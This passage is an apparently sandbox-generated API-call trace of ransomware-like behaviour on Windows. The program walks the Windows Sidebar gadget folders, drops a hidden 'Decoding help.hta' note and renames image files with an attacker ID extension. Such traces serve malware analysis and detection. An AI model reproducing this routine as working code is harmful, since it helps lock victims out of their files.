Sidebar\\Gadgets\\CPU.Gadget\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US" [0050.590] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" [0050.590] GlobalMemoryStatus (in: lpBuffer=0x1bb9fd10 | out: lpBuffer=0x1bb9fd10) [0050.590] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2525fd70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x478 [0050.736] CloseHandle (hObject=0x478) returned 1 [0050.737] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x1bb9fd30 | out: lpFindFileData=0x1bb9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7c4b8bc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb7c4b8bc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb7c4b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x23e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0050.737] lstrcpyW (in: lpString1=0x253300c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0050.737] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 65 [0050.737] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" [0050.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\decoding help.hta")) returned 0x1 [0050.737] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0050.737] lstrlenW (lpString="icon.png") returned 8 [0050.737] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0050.737] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 65 [0050.737] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png" [0050.738] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png" [0050.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.738] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x1bb9fd30 | out: lpFindFileData=0x1bb9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8191f35e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8191f35e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0050.738] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0050.738] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0050.738] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0050.738] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0050.738] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 65 [0050.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images" [0050.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0050.738] GlobalMemoryStatus (in: lpBuffer=0x1bb9fd10 | out: lpBuffer=0x1bb9fd10) [0050.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24508250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x478 [0050.766] CloseHandle (hObject=0x478) returned 1 [0050.766] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x1bb9fd30 | out: lpFindFileData=0x1bb9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4ad66a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba4ad66a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xba58159c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0050.766] lstrcpyW (in: lpString1=0x25390260, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0050.766] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 65 [0050.766] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" [0050.766] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\decoding help.hta")) returned 0x1 [0050.766] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0050.766] lstrlenW (lpString="logo.png") returned 8 [0050.766] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0050.766] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 65 [0050.766] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png" [0050.766] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png" [0050.766] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.766] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.766] FindNextFileW (in: hFindFile=0x5e2df0, lpFindFileData=0x1bb9fd30 | out: lpFindFileData=0x1bb9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba4ad66a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba4ad66a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xba58159c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0050.766] FindClose (in: hFindFile=0x5e2df0 | out: hFindFile=0x5e2df0) returned 1 Thread: id = 427 os_tid = 0xbb8 [0043.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*", lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2db0 [0045.195] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.195] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.195] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.195] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.195] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbcdf03, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbcbcdf03, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbb6510fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x406b, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0045.195] lstrcpyW (in: lpString1=0x10cfea08, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0045.195] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 70 [0045.195] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" [0045.195] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\decoding help.hta")) returned 0xffffffff [0045.195] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0045.536] WriteFile (in: hFile=0x1e8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1bcdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1bcdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.537] CloseHandle (hObject=0x1e8) returned 1 [0045.538] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.810] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0048.810] lstrlenW (lpString="drag.png") returned 8 [0048.810] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0048.810] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 70 [0048.810] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png" [0048.811] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png" [0048.811] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.576] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0050.576] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0050.576] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0050.576] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0050.578] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0050.578] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 70 [0050.578] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US" [0050.579] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" [0050.579] GlobalMemoryStatus (in: lpBuffer=0x1bcdfd10 | out: lpBuffer=0x1bcdfd10) [0050.579] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25227c98, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x394 [0050.730] CloseHandle (hObject=0x394) returned 1 [0050.730] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb67725c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xbb67725c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xbb67725c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1ae9, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0050.732] lstrcpyW (in: lpString1=0x25318058, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0050.732] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 70 [0050.732] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" [0050.732] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\decoding help.hta")) returned 0x1 [0050.732] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0050.732] lstrlenW (lpString="icon.png") returned 8 [0050.732] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0050.732] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 70 [0050.732] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png" [0050.732] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png" [0050.732] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.733] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819b78df, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819b78df, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0050.733] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0050.733] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0050.733] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0050.735] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0050.735] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 70 [0050.735] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images" [0050.735] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0050.735] GlobalMemoryStatus (in: lpBuffer=0x1bcdfd10 | out: lpBuffer=0x1bcdfd10) [0050.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25318058, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x394 [0050.765] CloseHandle (hObject=0x394) returned 1 [0050.765] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x1bcdfd30 | out: lpFindFileData=0x1bcdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcba7da4, 